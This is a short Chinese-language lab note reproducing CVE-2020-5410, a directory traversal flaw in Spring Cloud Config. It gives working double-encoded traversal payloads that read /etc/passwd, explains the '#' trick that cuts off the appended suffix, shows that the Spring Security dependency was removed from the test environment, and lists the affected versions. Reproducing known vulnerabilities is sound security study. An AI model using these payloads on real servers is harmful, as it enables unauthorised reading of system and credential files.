用之前的环境即可:
https://github.com/shadowsock5/spring-cloud-config-starter
PoC参考:
- https://github.com/osamahamad/CVE-2020-5410-POC
- https://github.com/threedr3am/learnjavabug/blob/a13aad49c93c05e6fb9db7668a9de6b0b1106307/spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java
- CVE-2020-5410 Spring Cloud Config目录穿越漏洞
127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
利用核心:使用#去注释掉springboot自动拼接的配置文件后缀
但是发现使用之前的环境是带着Spring Security的,由于payload中含有%25,命中其黑名单被拦截:
参考threedr3am大佬的:
https://github.com/threedr3am/learnjavabug/blob/master/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml
去掉这部分:
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
<version>2.2.2.RELEASE</version>
</dependency>
再重新启动。
PoC:
payload = "222.txt"
url = "/..%252F..%252F..%252F..%252F..%252F{0}%23/222/11".format(payload)
native的目录在:
/home/77/repos/spring-cloud-config-starter/config-repo
Payload为:
/..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23111/222
影响范围
Spring Cloud Config
2.2.0 to 2.2.2
2.1.0 to 2.1.8